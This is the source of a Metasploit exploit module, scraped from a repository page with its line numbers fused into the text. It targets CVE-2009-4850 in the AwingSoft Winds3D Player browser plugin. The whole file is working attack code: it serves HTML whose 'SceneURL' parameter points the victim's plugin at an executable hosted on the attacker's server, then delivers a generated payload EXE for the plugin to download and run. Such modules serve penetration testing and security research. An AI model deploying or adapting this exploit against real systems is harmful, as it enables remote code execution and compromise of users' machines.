Path: blob/master/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute',16'Description' => %q{17This module exploits an untrusted program execution vulnerability within the18Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for19IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'20parameter to the URL to an executable, an attacker can execute arbitrary21code.2223Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and24IE 8 on Windows XP SP3.25},26'License' => MSF_LICENSE,27'Author' => [28'jduck' # original discovery & metasploit module29],30'References' => [31[ 'CVE', '2009-4850' ],32[ 'OSVDB', '60049' ]33],34'Payload' => {35'Space' => 2048,36'StackAdjustment' => -3500,37},38'Platform' => 'win',39'Targets' => [40[ 'Automatic', {}],41],42'DisclosureDate' => '2009-11-14',43'DefaultTarget' => 0,44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)51end5253def on_request_uri(cli, request)54payload_url = "http://"55payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']56payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"5758if (request.uri.match(/payload/))59return if ((p = regenerate_payload(cli)) == nil)6061data = generate_payload_exe({ :code => p.encoded })62print_status("Sending EXE payload")63send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })6465# Handle the payload66# handler(cli)67return68end6970# otherwise, send the html..71html = %Q|<html>72<body>73<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'74codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>75<param name="SceneURL" value="#{payload_url}#">76<embed type="application/x-awingsoft-winds3d" src="#{payload_url}">77</object>78|7980print_status("Sending #{self.name} HTML")81# Transmit the compressed response to the client82send_response(cli, html, { 'Content-Type' => 'text/html' })83end84end858687